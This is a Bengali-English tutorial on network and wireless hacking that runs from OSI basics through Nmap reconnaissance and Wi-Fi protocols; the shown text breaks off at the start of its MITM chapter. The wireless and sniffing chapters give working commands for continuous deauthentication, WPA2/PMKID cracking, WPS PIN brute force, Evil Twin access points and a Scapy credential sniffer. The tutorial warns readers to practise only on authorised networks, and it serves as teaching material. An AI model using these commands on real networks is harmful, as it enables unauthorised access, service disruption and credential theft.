📡

Network Hacking & Wireless Security

সাইবার সিকিউরিটির জন্য সম্পূর্ণ নেটওয়ার্ক গাইডComplete Network Guide for Cyber Security

OSI Model থেকে WiFi Cracking পর্যন্ত — Network Security শেখার একমাত্র সম্পূর্ণ বাংলা রিসোর্স। এই গাইড পড়লে আর কোনো বই বা কোর্সের দরকার নেই। From OSI Model to WiFi Security — the only complete Bengali resource for Network Security. After reading this, no other book or course needed.

🌐 OSI/TCP-IP 🔍 Reconnaissance 📶 WiFi Security 🎭 MITM Attack 👃 Packet Sniffing 🔒 Firewall Bypass 🛡️ Network Defense 🔧 Wireshark 📡 Aircrack-ng
root@kali:~# iwconfig
wlan0 IEEE 802.11 Mode:Monitor
root@kali:~# airodump-ng wlan0mon
BSSID PWR Beacons #Data CH MB ENC
AA:BB:CC:DD:EE:FF -45 120 45 6 54 WPA2
[*] Target network found...
📋 সূচিপত্রTable of Contents
01. Network Fundamentals — OSI ও TCP/IPNetwork Fundamentals — OSI & TCP/IP
OSI 7 Layer, TCP/IP, Protocols, Ports, IP Addressing, Subnetting
02. Network ReconnaissanceNetwork Reconnaissance
Nmap, Passive Recon, OSINT, DNS Enumeration, Service Detection
03. Wireless Security ProtocolsWireless Security Protocols
WEP, WPA, WPA2, WPA3, 802.11 Standards, Encryption Mechanisms
04. Wireless AttacksWireless Attacks
Monitor Mode, Handshake Capture, Deauth, Evil Twin, WPS Attack
05. Packet Sniffing ও AnalysisPacket Sniffing & Analysis
Wireshark, tcpdump, Scapy, Traffic Analysis, Credential Capture
06. MITM — Man-in-the-MiddleMITM — Man-in-the-Middle
ARP Spoofing, DNS Spoofing, SSL Strip, Bettercap
07. Network Service AttacksNetwork Service Attacks
FTP/SSH/Telnet/SMB/RDP Brute Force, Exploitation
08. Firewall ও IDS EvasionFirewall & IDS Evasion
Firewall Rules, Port Knocking, Tunneling, Fragmentation
09. VPN ও TunnelingVPN & Tunneling
SSH Tunneling, Proxychains, Tor, OpenVPN, WireGuard
10. Network Defense ও HardeningNetwork Defense & Hardening
Firewall Setup, IDS/IPS, Network Segmentation, WiFi Hardening
11. Tools ReferenceTools Reference
Nmap, Wireshark, Aircrack-ng, Bettercap, Metasploit, netdiscover
12. Real-World Lab ScenariosReal-World Lab Scenarios
Home Lab Setup, Practice Networks, CTF Network Challenges
Chapter 01
🌐 Network Fundamentals — OSI ও TCP/IPNetwork Fundamentals — OSI & TCP/IP
Network hacking বুঝতে হলে এই foundation টা জানতেই হবেThis foundation is mandatory to understand network hacking

🏗️ OSI Model — ৭ LayerOSI Model — 7 Layers

OSI (Open Systems Interconnection) Model হলো network communication-এর theoretical framework। প্রতিটা layer-এ আলাদা attack করা যায়। Security professional হিসেবে প্রতিটা layer জানা বাধ্যতামূলক।The OSI Model is the theoretical framework for network communication. Each layer can be attacked differently. Knowing every layer is mandatory as a security professional.

7ApplicationHTTP, HTTPS, FTP, SSH, DNS, SMTP, SNMP
6PresentationSSL/TLS, Encryption, Encoding (ASCII, JPEG)
5SessionNetBIOS, RPC, Session management
4TransportTCP (reliable), UDP (fast), Port numbers
3NetworkIP, ICMP, OSPF, BGP — Routing
2Data LinkEthernet, MAC address, ARP, Switch
1PhysicalCables, WiFi signals, Hub, Repeater

⚔️ Layer-এ AttackAttacks per Layer

  • L7: SQL Injection, XSS, DNS Poison
  • L6: SSL Strip, Certificate Spoof
  • L5: Session Hijack
  • L4: SYN Flood, Port Scan
  • L3: IP Spoofing, ICMP Flood
  • L2: ARP Spoof, MAC Flood
  • L1: Physical Tap, Jamming

🛡️ Layer-এ DefenseDefense per Layer

  • L7: WAF, Input Validation
  • L6: Strong TLS (1.3), HSTS
  • L5: Session Timeout, Re-auth
  • L4: Rate Limiting, Firewall
  • L3: Ingress Filtering, ACL
  • L2: DAI, Port Security
  • L1: Physical Security

🔄 TCP/IP Model ও ProtocolsTCP/IP Model & Protocols

LayerProtocolPortকাজPurposeAttack Vector
ApplicationHTTP80Web trafficSniffing, SQLi, XSS
ApplicationHTTPS443Encrypted webSSL Strip, Cert spoof
ApplicationFTP21File transferBrute force, Sniff
ApplicationSSH22Secure shellBrute force, Key theft
ApplicationTelnet23Remote shell (insecure)Plaintext sniffing
ApplicationDNS53Name resolutionDNS Spoofing, Cache Poison
ApplicationSMTP25Email sendRelay abuse, Phishing
ApplicationSMB445File sharing (Windows)EternalBlue, Pass-the-Hash
ApplicationRDP3389Remote DesktopBrute force, BlueKeep
TransportTCPReliable connectionSYN flood, RST inject
TransportUDPFast, connectionlessUDP flood, Amplification
NetworkICMPPing, Error messagesPing flood, Smurf attack
NetworkARPIP→MAC resolutionARP Spoofing (MITM)

🔢 IP Addressing ও SubnettingIP Addressing & Subnetting

# IP Address Classes Class A: 1.0.0.0 - 126.255.255.255 (Large networks) Class B: 128.0.0.0 - 191.255.255.255 (Medium networks) Class C: 192.0.0.0 - 223.255.255.255 (Small networks) # Private IP Ranges (RFC 1918) 10.0.0.0/8 # Class A private — 10.x.x.x 172.16.0.0/12 # Class B private — 172.16.x.x to 172.31.x.x 192.168.0.0/16 # Class C private — 192.168.x.x (home networks) # Subnet Mask চেনা /24 = 255.255.255.0 → 254 hosts (192.168.1.0/24) /16 = 255.255.0.0 → 65534 hosts /8 = 255.0.0.0 → 16777214 hosts /30 = 255.255.255.252 → 2 hosts (point-to-point links) # নিজের IP/Network বের করো $ ip addr show $ ip route show $ hostname -I # Network range calculate করো (Python) import ipaddress net = ipaddress.ip_network("192.168.1.0/24") print(f"Network: {net.network_address}") print(f"Broadcast: {net.broadcast_address}") print(f"Hosts: {net.num_addresses - 2}") for ip in list(net.hosts())[:5]: print(ip)

🤝 TCP Three-Way HandshakeTCP Three-Way Handshake

TCP connection এই 3-step process-এ establish হয়। Port scanner এবং firewall bypass বুঝতে এটা জানা অপরিহার্য।TCP connections are established via this 3-step process. Understanding this is essential for port scanners and firewall bypass.

Client Server | | | ——— SYN ————————————→ | Client: "সংযোগ করতে চাই" (seq=100) | ←—— SYN-ACK ————————— | Server: "ঠিক আছে, তুমি কি ready?" (seq=200, ack=101) | ——— ACK ————————————→ | Client: "হ্যাঁ, ready!" (ack=201) | | | [Connection Established]| # Port Scanner এই principle ব্যবহার করে: # SYN পাঠাও → SYN-ACK পেলে = OPEN # SYN পাঠাও → RST পেলে = CLOSED # SYN পাঠাও → No reply = FILTERED (firewall) # Nmap SYN scan (stealth — 3rd step complete করে না) $ nmap -sS target_ip # SYN scan (root needed) $ nmap -sT target_ip # Full TCP connect scan $ nmap -sU target_ip # UDP scan

📋 Important Network CommandsImportant Network Commands

# Network interface দেখো $ ip addr show # IP addresses $ ip link show # Interface status $ ifconfig # Legacy (এখনও কাজ করে) $ iwconfig # Wireless interfaces # Routing table $ ip route show $ route -n # Active connections ও ports $ ss -tlnp # Listening TCP ports $ ss -tulnp # TCP + UDP $ netstat -tulnp # Legacy netstat # ARP table (MAC addresses) $ arp -a $ ip neigh show # DNS lookup $ nslookup google.com $ dig google.com A $ dig google.com MX $ host google.com # Connectivity test $ ping -c 4 8.8.8.8 $ traceroute 8.8.8.8 # Route trace $ mtr 8.8.8.8 # Live traceroute # Firewall rules দেখো $ iptables -L -n -v $ nft list ruleset # nftables (modern)

✅ Chapter 1 Summary

  • OSI 7 layer ও প্রতিটায় কী attack হয় — জানো
  • TCP/IP protocols ও ports মুখস্থ করো
  • IP addressing, subnet calculation — practice করো
  • TCP 3-way handshake — port scanning-এর ভিত্তি
  • Basic Linux network commands — daily use করো
Chapter 02
🔍 Network ReconnaissanceNetwork Reconnaissance
Target সম্পর্কে তথ্য সংগ্রহের সম্পূর্ণ পদ্ধতিComplete methodology for gathering information about targets

🗺️ Reconnaissance TypesReconnaissance Types

👁️ Passive ReconPassive Recon

Target-এ কোনো packet না পাঠিয়ে তথ্য সংগ্রহ। Target জানতে পারে না।Gather info without sending packets to target. Target doesn't know.

  • WHOIS lookup
  • DNS enumeration
  • Google Dorking
  • Shodan search
  • Social media OSINT

Active ReconActive Recon

Target-এ packet পাঠিয়ে তথ্য সংগ্রহ। IDS/firewall log হতে পারে।Gather info by sending packets to target. IDS/firewall may log it.

  • Port scanning (Nmap)
  • Ping sweep
  • Banner grabbing
  • Service detection
  • OS fingerprinting

🗺️ Nmap — The King of ScannersNmap — The King of Scanners

# ════ HOST DISCOVERY ════ $ nmap -sn 192.168.1.0/24 # Ping sweep (live hosts) $ nmap -sn -PS22,80,443 10.0.0.0/24 # TCP SYN ping $ nmap -PR 192.168.1.0/24 # ARP ping (local network) # ════ PORT SCANNING ════ $ nmap 192.168.1.1 # Top 1000 ports $ nmap -p- 192.168.1.1 # All 65535 ports $ nmap -p 22,80,443,3306 192.168.1.1 # Specific ports $ nmap -p 1-1024 192.168.1.1 # Port range # ════ SCAN TYPES ════ $ nmap -sS 192.168.1.1 # SYN scan (stealth, root) $ nmap -sT 192.168.1.1 # TCP connect (no root needed) $ nmap -sU 192.168.1.1 # UDP scan $ nmap -sA 192.168.1.1 # ACK scan (firewall mapping) $ nmap -sN 192.168.1.1 # NULL scan (no flags) $ nmap -sX 192.168.1.1 # Xmas scan (FIN+PSH+URG) $ nmap -sF 192.168.1.1 # FIN scan # ════ SERVICE & VERSION DETECTION ════ $ nmap -sV 192.168.1.1 # Service version $ nmap -sV --version-intensity 9 # Aggressive version detect $ nmap -O 192.168.1.1 # OS detection $ nmap -A 192.168.1.1 # All: OS+version+script+traceroute # ════ NSE SCRIPTS ════ $ nmap --script=banner 192.168.1.1 # Banner grabbing $ nmap --script=vuln 192.168.1.1 # Vulnerability scan $ nmap --script=http-enum 192.168.1.1 # HTTP enumeration $ nmap --script=smb-vuln* 192.168.1.1 # SMB vulnerabilities $ nmap --script=ftp-anon 192.168.1.1 # Anonymous FTP $ nmap --script=ssh-brute 192.168.1.1 # SSH brute force $ nmap --script=dns-brute domain.com # DNS brute force # ════ SPEED & TIMING ════ $ nmap -T0 target # Paranoid (very slow, IDS evasion) $ nmap -T1 target # Sneaky $ nmap -T2 target # Polite $ nmap -T3 target # Normal (default) $ nmap -T4 target # Aggressive (fast) $ nmap -T5 target # Insane (very fast, may miss) # ════ EVASION ════ $ nmap -D RND:10 192.168.1.1 # Decoy scan $ nmap -S spoofed_ip 192.168.1.1 # Source IP spoof $ nmap -f target # Fragment packets $ nmap --data-length 200 target # Random data padding # ════ OUTPUT ════ $ nmap -oN scan.txt target # Normal output $ nmap -oX scan.xml target # XML output $ nmap -oG scan.grep target # Grepable output $ nmap -oA scan target # All formats

🔎 DNS EnumerationDNS Enumeration

# Basic DNS lookup $ dig target.com ANY # All records $ dig target.com A # IPv4 address $ dig target.com AAAA # IPv6 address $ dig target.com MX # Mail server $ dig target.com NS # Name servers $ dig target.com TXT # SPF, DKIM, verification $ dig target.com SOA # Start of authority $ dig -x 8.8.8.8 # Reverse lookup (PTR) # Zone Transfer চেষ্টা (misconfigured DNS) $ dig axfr target.com @ns1.target.com $ host -l target.com ns1.target.com # Subdomain Brute Force $ gobuster dns -d target.com -w /usr/share/wordlists/subdomains.txt $ dnsenum target.com $ dnsrecon -d target.com -t brt -D /usr/share/wordlists/subdomains.txt $ amass enum -d target.com # Passive + active # Fierce — automated DNS recon $ fierce --domain target.com

🌐 Network Discovery ToolsNetwork Discovery Tools

# netdiscover — ARP based host discovery $ netdiscover -r 192.168.1.0/24 # Active scan $ netdiscover -p # Passive (just listen) $ netdiscover -i eth0 -r 10.0.0.0/24 # arp-scan $ arp-scan --localnet $ arp-scan -I eth0 192.168.1.0/24 # masscan — ultra-fast internet scanner $ masscan -p80,443 192.168.1.0/24 --rate=1000 $ masscan -p0-65535 10.0.0.0/8 --rate=10000 # nbtscan — NetBIOS scan (Windows networks) $ nbtscan 192.168.1.0/24 # Shodan CLI (internet-wide) $ shodan search "apache 2.4" country:BD $ shodan host 8.8.8.8 $ shodan search port:22 default password

✅ Chapter 2 Summary

  • Passive vs Active recon — কখন কোনটা ব্যবহার করবে
  • Nmap-এর সব important flag মুখস্থ করো
  • DNS zone transfer — misconfigured server থেকে সব subdomain
  • netdiscover/arp-scan — local network-এ live host বের করো
Chapter 03
📶 Wireless Security ProtocolsWireless Security Protocols
WEP থেকে WPA3 — WiFi encryption-এর সম্পূর্ণ ইতিহাস ও দুর্বলতাWEP to WPA3 — complete history and weaknesses of WiFi encryption

📡 802.11 WiFi Standards802.11 WiFi Standards

StandardNameFrequencyMax SpeedRange
802.11bWiFi 12.4 GHz11 Mbps35m indoor
802.11aWiFi 25 GHz54 Mbps35m indoor
802.11gWiFi 32.4 GHz54 Mbps38m indoor
802.11nWiFi 42.4/5 GHz600 Mbps70m indoor
802.11acWiFi 55 GHz3.5 Gbps35m indoor
802.11axWiFi 62.4/5/6 GHz9.6 GbpsIndoor+outdoor

🔓 WEP — Wired Equivalent Privacy (ভেঙে পড়া)WEP — Wired Equivalent Privacy (Broken)

WEP ছিল WiFi-এর প্রথম security standard (1997)। এটা RC4 cipher ব্যবহার করে কিন্তু IV (Initialization Vector) মাত্র 24-bit — ফলে same IV repeat হয় এবং পুরো encryption ভেঙে পড়ে।WEP was the first WiFi security standard (1997). It uses RC4 cipher but with only a 24-bit IV — causing IV repetition that breaks the entire encryption.

WEP-এর দুর্বলতাWEP Weaknesses

  • IV মাত্র 24-bit — collision inevitable
  • Static key — একবার জানলে সব decrypt
  • RC4 keystream reuse vulnerability
  • ~50,000 packets দিয়েই crack করা যায়
  • aircrack-ng দিয়ে মিনিটের মধ্যে crack

🔧 WEP Crack Tool

  • aircrack-ng — primary tool
  • aireplay-ng — packet injection
  • airodump-ng — capture
  • আজকাল WEP নেটওয়ার্ক প্রায় নেই
  • ⛔ 2003 থেকে deprecated

🔐 WPA — WiFi Protected AccessWPA — WiFi Protected Access

WPA (2003) WEP-এর জায়গায় এলো। TKIP (Temporal Key Integrity Protocol) ব্যবহার করে। প্রতিটা packet-এ আলাদা key generate হয়। কিন্তু এটাও WPA2 এর চেয়ে দুর্বল।WPA (2003) replaced WEP. Uses TKIP (Temporal Key Integrity Protocol). Generates a different key per packet. But still weaker than WPA2.

WPA Authentication Modes: WPA-Personal (WPA-PSK) └─ Pre-Shared Key — home/small office └─ Password থেকে PMK (Pairwise Master Key) তৈরি হয় └─ 4-way handshake দিয়ে authenticate হয় └─ Handshake capture করে offline crack করা যায় WPA-Enterprise (WPA-802.1X) └─ RADIUS server ব্যবহার করে └─ প্রতিটা user-এর আলাদা credential └─ Corporate networks-এ ব্যবহার হয় └─ Crack করা অনেক কঠিন WPA Encryption: TKIP → RC4-based, per-packet key mixing CCMP → AES-based (optional in WPA, mandatory in WPA2)

🔒 WPA2 — Current StandardWPA2 — Current Standard

WPA2 (2004) সবচেয়ে বেশি ব্যবহৃত WiFi security protocol। AES-CCMP encryption ব্যবহার করে যা অনেক শক্তিশালী। Primary attack vector হলো 4-way handshake capture করে offline dictionary/brute force attack।WPA2 (2004) is the most widely used WiFi security protocol. Uses AES-CCMP encryption which is very strong. Primary attack vector is capturing the 4-way handshake for offline dictionary/brute force attack.

WPA2 4-Way Handshake Process: AP (Router) Client | | | ←──── Association req ──── | Client joins network | ──── Association resp ───→ | | | | ─── MSG1: ANonce ─────────→ | AP sends random nonce | ←── MSG2: SNonce+MIC ───── | Client sends nonce+MIC | ─── MSG3: GTK+MIC ────────→ | AP sends group key | ←── MSG4: ACK ──────────── | Client confirms | | | [Encrypted communication] | # Attack: MSG1+MSG2 (অথবা MSG2+MSG3) capture করলেই যথেষ্ট # PTK (Pairwise Transient Key) = PBKDF2(PSK, SSID, ANonce, SNonce, MAC) # MIC (Message Integrity Code) verify করে password সঠিক কিনা
ℹ️ PMKID Attack (2018): Handshake capture ছাড়াই সরাসরি AP-এর PMKID থেকে password crack করা যায়। Client-এর উপস্থিতি লাগে না। hcxdumptool দিয়ে PMKID capture করো।Without capturing a handshake, you can crack the password directly from the AP's PMKID. No client needed. Use hcxdumptool to capture PMKID.

🛡️ WPA3 — Latest ও Most SecureWPA3 — Latest & Most Secure

FeatureWPA2WPA3
Key ExchangePSK (4-way handshake)SAE (Dragonfly) — dictionary attack resist
Forward Secrecy❌ নেই✅ আছে — পুরানো traffic safe
Offline Dictionary Attack✅ সম্ভব❌ সম্ভব না (online only)
PMKID Attack✅ সম্ভব❌ সম্ভব না
Open Network Encryption❌ নেই✅ OWE (Opportunistic Wireless Encryption)
Enterprise Encryption128-bit192-bit (CNSA suite)
Known WeaknessHandshake crackDragonblood (side-channel, পুরানো impl.)

🔑 WPS — WiFi Protected SetupWPS — WiFi Protected Setup

WPS একটা সহজ connection mechanism — 8-digit PIN দিয়ে connect করা যায়। কিন্তু PIN দুই ভাগে verify হয় (4+4 digit), তাই মাত্র 11,000 combination try করলেই PIN বের করা যায়।WPS is a simple connection mechanism using an 8-digit PIN. But the PIN is verified in two halves (4+4 digits), so only ~11,000 combinations need to be tried to find the PIN.

# WPS PIN attack $ wash -i wlan0mon # WPS-enabled networks খোঁজো $ reaver -i wlan0mon -b BSSID -vv # WPS PIN brute force $ bully -b BSSID -e ESSID -c CH wlan0mon # Alternative to reaver # WPS Lock চেক (3 failed attempts = lock) $ reaver -i wlan0mon -b BSSID -L # Ignore locks $ reaver -i wlan0mon -b BSSID -d 30 # 30s delay between attempts # PixieDust Attack (offline WPS crack) $ reaver -i wlan0mon -b BSSID -K 1 # Pixie mode

✅ Chapter 3 Summary

  • WEP → RC4 + 24-bit IV → completely broken
  • WPA → TKIP → handshake capture করে offline crack
  • WPA2 → AES-CCMP → 4-way handshake + PMKID attack
  • WPA3 → SAE → offline crack সম্ভব না
  • WPS → 8-digit PIN → ~11,000 try-তেই crack
Chapter 04
⚔️ Wireless AttacksWireless Attacks
Monitor Mode, Handshake Capture, Deauth, Evil Twin — সব Wireless AttackMonitor Mode, Handshake Capture, Deauth, Evil Twin — all Wireless Attacks
🚨 শুধুমাত্র নিজের network বা authorized lab-এ practice করো। অন্যের WiFi crack করা বাংলাদেশে ICT Act-এ অপরাধ।Practice only on your own network or authorized lab. Cracking others' WiFi is a crime under the ICT Act in Bangladesh.

📡 Monitor Mode SetupMonitor Mode Setup

Monitor Mode মানে wireless adapter সব packets capture করতে পারে — শুধু নিজের network না। এটা enable না করলে WiFi attack করা যায় না।Monitor Mode means the wireless adapter can capture all packets — not just your own network. WiFi attacks are impossible without enabling this.

# Compatible adapter দরকার (internal WiFi কাজ করে না) # Recommended: Alfa AWUS036ACH, AWUS036NHA, TP-Link TL-WN722N # Method 1: airmon-ng (সহজ) $ airmon-ng check kill # Conflicting processes kill করো $ airmon-ng start wlan0 # Monitor mode ON → wlan0mon তৈরি হবে $ airmon-ng stop wlan0mon # Monitor mode OFF # Method 2: iw (manual) $ ip link set wlan0 down $ iw dev wlan0 set type monitor $ ip link set wlan0 up # Method 3: iwconfig $ ifconfig wlan0 down $ iwconfig wlan0 mode monitor $ ifconfig wlan0 up # Verify করো $ iwconfig wlan0mon wlan0mon IEEE 802.11 Mode:Monitor # Specific channel-এ lock করো $ iwconfig wlan0mon channel 6 $ iw dev wlan0mon set channel 6

🎯 airodump-ng — Network Discoveryairodump-ng — Network Discovery

# সব WiFi networks দেখো $ airodump-ng wlan0mon # Output এ কী দেখাবে: BSSID PWR Beacons #Data CH MB ENC CIPHER AUTH ESSID AA:BB:CC:DD:EE:FF -65 234 12 6 54 WPA2 CCMP PSK MyNetwork 11:22:33:44:55:66 -80 45 0 11 130 WPA2 CCMP PSK Neighbor # Specific network-এ focus করো $ airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon # channel↑ target BSSID↑ output file↑ # Output files তৈরি হবে: # capture-01.cap ← handshake এখানে থাকবে # capture-01.csv ← CSV data # capture-01.kismet.netxml # Connected clients দেখো STATION PWR Rate Lost Frames Probe FF:EE:DD:CC:BB:AA -55 54-54 0 45 MyNetwork

💥 Deauthentication AttackDeauthentication Attack

Deauth attack-এ forged deauthentication frame পাঠিয়ে client-কে disconnect করা হয়। Client reconnect করার সময় 4-way handshake capture করা যায়।A deauth attack forces a client to disconnect by sending forged deauthentication frames. The 4-way handshake can be captured when the client reconnects.

# Deauth পাঠাও → client disconnect হবে → reconnect করবে → handshake capture হবে # All clients-কে deauth করো $ aireplay-ng -0 5 -a AA:BB:CC:DD:EE:FF wlan0mon # ↑deauth count ↑target AP BSSID # Specific client-কে deauth করো $ aireplay-ng -0 10 -a AA:BB:CC:DD:EE:FF -c FF:EE:DD:CC:BB:AA wlan0mon # ↑AP BSSID ↑Client MAC # Continuous deauth (DOS) $ aireplay-ng -0 0 -a AA:BB:CC:DD:EE:FF wlan0mon # 0 = infinite — client কখনো connect করতে পারবে না # Terminal 1: airodump চালাও (capture mode) $ airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w handshake wlan0mon # Terminal 2: deauth পাঠাও $ aireplay-ng -0 5 -a AA:BB:CC:DD:EE:FF wlan0mon # Terminal 1-এ দেখবে: WPA handshake: AA:BB:CC:DD:EE:FF

🔓 WPA2 Handshake CrackingWPA2 Handshake Cracking

# Method 1: aircrack-ng (Dictionary attack) $ aircrack-ng handshake-01.cap -w /usr/share/wordlists/rockyou.txt $ aircrack-ng handshake-01.cap -w passwords.txt -e "NetworkName" # Method 2: hashcat (GPU — much faster!) # .cap → .hc22000 format convert $ hcxpcapngtool -o hash.hc22000 handshake-01.cap # hashcat দিয়ে crack $ hashcat -m 22000 hash.hc22000 rockyou.txt $ hashcat -m 22000 hash.hc22000 rockyou.txt -r rules/best64.rule $ hashcat -m 22000 hash.hc22000 -a 3 ?d?d?d?d?d?d?d?d # 8-digit brute force # Method 3: PMKID Attack (client না থাকলেও) $ hcxdumptool -i wlan0mon -o pmkid.pcapng --enable_status=1 $ hcxpcapngtool -o hash.hc22000 pmkid.pcapng $ hashcat -m 22000 hash.hc22000 rockyou.txt # Custom wordlist তৈরি $ crunch 8 8 0123456789 -o 8digit.txt # 8-digit numbers $ crunch 8 10 abcdefghijklmnopqrstuvwxyz # Lowercase 8-10 chars # hashcat masks # ?l = lowercase ?u = uppercase ?d = digit ?s = special $ hashcat -m 22000 hash.hc22000 -a 3 ?l?l?l?l?d?d?d?d # 4 letters + 4 digits

👿 Evil Twin AttackEvil Twin Attack

Evil Twin মানে victim network-এর নামে একটা fake AP তৈরি করা। Victim connect করলে তার traffic আমাদের দিয়ে যাবে।Evil Twin means creating a fake AP with the same name as the victim's network. When the victim connects, their traffic flows through us.

# hostapd দিয়ে fake AP তৈরি # /etc/hostapd/fake.conf interface=wlan0 driver=nl80211 ssid=FreeWiFi # Target network-এর নাম hw_mode=g channel=6 auth_algs=1 ignore_broadcast_ssid=0 $ hostapd /etc/hostapd/fake.conf # DHCP server setup (dnsmasq) $ dnsmasq --interface=wlan0 --dhcp-range=192.168.1.2,192.168.1.30,255.255.255.0,12h \ --no-resolv --server=8.8.8.8 # IP Forwarding enable করো $ echo 1 > /proc/sys/net/ipv4/ip_forward $ iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE # Automated: hostapd-wpe (WPA Enterprise attack) $ hostapd-wpe /etc/hostapd-wpe/hostapd-wpe.conf # airbase-ng দিয়ে (simpler) $ airbase-ng -a AA:BB:CC:DD:EE:FF -e "TargetSSID" -c 6 wlan0mon

🔧 Wireless Attack Toolkit SummaryWireless Attack Toolkit Summary

ToolকাজPurposeCommand
airmon-ngMonitor modeairmon-ng start wlan0
airodump-ngNetwork scan ও captureairodump-ng wlan0mon
aireplay-ngPacket injection, deauthaireplay-ng -0 5 -a BSSID wlan0mon
aircrack-ngWEP/WPA crack (CPU)aircrack-ng cap.cap -w wordlist
hashcatWPA crack (GPU, fast)hashcat -m 22000 hash rockyou.txt
hcxdumptoolPMKID capturehcxdumptool -i wlan0mon -o out.pcapng
reaverWPS PIN attackreaver -i wlan0mon -b BSSID -vv
washWPS enabled AP খোঁজোwash -i wlan0mon
wifiteAutomated WiFi attackwifite
fern-wifi-crackerGUI WiFi crackerfern-wifi-cracker

✅ Chapter 4 Summary

  • Monitor mode = wireless attack-এর প্রথম ধাপ
  • airodump-ng দিয়ে scan → aireplay-ng দিয়ে deauth → handshake capture
  • aircrack-ng (CPU) vs hashcat (GPU) — hashcat অনেক দ্রুত
  • PMKID attack = client ছাড়াই WPA2 crack
  • WPS attack = ~11,000 try-তেই PIN বের হয়
  • Evil Twin = fake AP দিয়ে victim-এর traffic intercept
Chapter 05
👃 Packet Sniffing ও AnalysisPacket Sniffing & Analysis
Wireshark, tcpdump, Scapy — Network traffic দেখা ও বিশ্লেষণWireshark, tcpdump, Scapy — Viewing and analyzing network traffic

🦈 Wireshark — GUI Packet AnalyzerWireshark — GUI Packet Analyzer

# Wireshark start করো $ wireshark & $ wireshark -i eth0 & # Specific interface $ wireshark -r capture.pcap & # Saved file open ═══ DISPLAY FILTERS (সবচেয়ে গুরুত্বপূর্ণ) ═══ # Protocol filter http # শুধু HTTP traffic dns # শুধু DNS queries tcp # শুধু TCP udp # শুধু UDP icmp # ICMP (ping) arp # ARP packets ssl or tls # Encrypted traffic ftp # FTP ssh # SSH smb # SMB file sharing # IP filter ip.addr == 192.168.1.1 # Specific IP (src বা dst) ip.src == 192.168.1.100 # Source IP ip.dst == 8.8.8.8 # Destination IP ip.addr == 192.168.1.0/24 # Entire subnet # Port filter tcp.port == 80 # TCP port 80 tcp.dstport == 443 # Destination port tcp.port == 22 or tcp.port == 80 # Multiple ports # Content filter http.request.method == "POST" # HTTP POST শুধু http.request.uri contains "login" # URL-এ login আছে frame contains "password" # Packet-এ password শব্দ dns.qry.name contains "google" # DNS query # Combination http and ip.src == 192.168.1.100 tcp.port == 80 and !ip.addr == 192.168.1.1 http.request.method == "POST" and http contains "password"

🖥️ tcpdump — CLI Packet Capturetcpdump — CLI Packet Capture

# Basic capture $ tcpdump -i eth0 # eth0-এ capture $ tcpdump -i any # সব interface $ tcpdump -i eth0 -w output.pcap # File-এ save $ tcpdump -r output.pcap # File থেকে read $ tcpdump -i eth0 -n # DNS resolve না করে $ tcpdump -i eth0 -v # Verbose $ tcpdump -i eth0 -X # Hex+ASCII dump $ tcpdump -i eth0 -c 100 # 100 packet capture করে বন্ধ # BPF Filters $ tcpdump -i eth0 host 192.168.1.1 # Specific host $ tcpdump -i eth0 src 192.168.1.100 # Source IP $ tcpdump -i eth0 dst 8.8.8.8 # Dest IP $ tcpdump -i eth0 port 80 # Port 80 $ tcpdump -i eth0 tcp port 443 # TCP port 443 $ tcpdump -i eth0 udp port 53 # DNS $ tcpdump -i eth0 net 192.168.1.0/24 # Subnet $ tcpdump -i eth0 'tcp[tcpflags] == tcp-syn' # SYN packets only $ tcpdump -i eth0 not port 22 # SSH বাদে সব $ tcpdump -i eth0 port 80 or port 443 # HTTP + HTTPS # HTTP credentials capture (unencrypted) $ tcpdump -i eth0 -A port 80 | grep -E "username|password|pass|login" # Live display + save $ tcpdump -i eth0 -w - | tee output.pcap | tcpdump -r -

🐍 Scapy দিয়ে Packet AnalysisPacket Analysis with Scapy

from scapy.all import * # Live sniff করো def packet_handler(pkt): if pkt.haslayer(IP): src = pkt[IP].src dst = pkt[IP].dst # HTTP POST → credentials চুরি if pkt.haslayer(TCP) and pkt.haslayer(Raw): payload = pkt[Raw].load.decode('utf-8', errors='ignore') keywords = ['password', 'passwd', 'user', 'login', 'pwd'] if any(kw in payload.lower() for kw in keywords): print(f"\n[!] CREDENTIALS from {src}:") print(payload[:300]) # DNS queries log if pkt.haslayer(DNS) and pkt[DNS].qr == 0: query = pkt[DNS].qd.qname.decode('utf-8', errors='ignore') print(f"[DNS] {src} → {query}") sniff(iface="eth0", prn=packet_handler, store=0, filter="tcp port 80 or udp port 53") # .pcap file analyze করো packets = rdpcap("capture.pcap") print(f"Total packets: {len(packets)}") # HTTP GET requests বের করো for pkt in packets: if pkt.haslayer(Raw): payload = pkt[Raw].load.decode('utf-8', errors='ignore') if 'GET ' in payload or 'POST ' in payload: print(f"[HTTP] {payload[:100]}")

🔍 Wireshark Forensics — Real ScenariosWireshark Forensics — Real Scenarios

════ Scenario 1: HTTP Credentials বের করো ════ Filter: http.request.method == "POST" → Packet → Follow → HTTP Stream → username=admin&password=secret দেখতে পাবে ════ Scenario 2: DNS Exfiltration দেখো ════ Filter: dns.qry.name contains "suspicious.com" → আসামান্য অনেক DNS query = data exfiltration ════ Scenario 3: Port Scan Detect করো ════ Filter: tcp.flags.syn == 1 and tcp.flags.ack == 0 → একই source থেকে অনেক SYN = port scan ════ Scenario 4: FTP Credentials ════ Filter: ftp → USER এবং PASS command plaintext-এ দেখাবে ════ Scenario 5: Telnet Session ════ Filter: telnet → Follow TCP Stream → সব keystrokes দেখবে ════ Useful Wireshark Statistics ════ Statistics → Protocol Hierarchy → কোন protocol কতটুকু Statistics → Conversations → কে কার সাথে কথা বলছে Statistics → Endpoints → সব IP/MAC list Statistics → IO Graphs → Traffic graph Analyze → Expert Information → Errors/warnings

✅ Chapter 5 Summary

  • Wireshark display filter জানলে যেকোনো traffic analyze করা যায়
  • tcpdump = server-এ headless capture-এর জন্য
  • HTTP traffic-এ credentials plaintext-এ দেখা যায়
  • DNS queries দিয়ে কার কাছে যাচ্ছে বোঝা যায়
  • Scapy দিয়ে custom packet analysis automate করো
Chapter 06
🎭 MITM — Man-in-the-MiddleMITM — Man-in-the-Middle
ARP Spoofing, DNS Spoofing, SSL Strip, Bettercap দিয়ে MITMARP Spoofing, DNS Spoofing, SSL Strip, MITM with Bettercap

🤔 MITM Attack কীভাবে কাজ করে?How Does a MITM Attack Work?

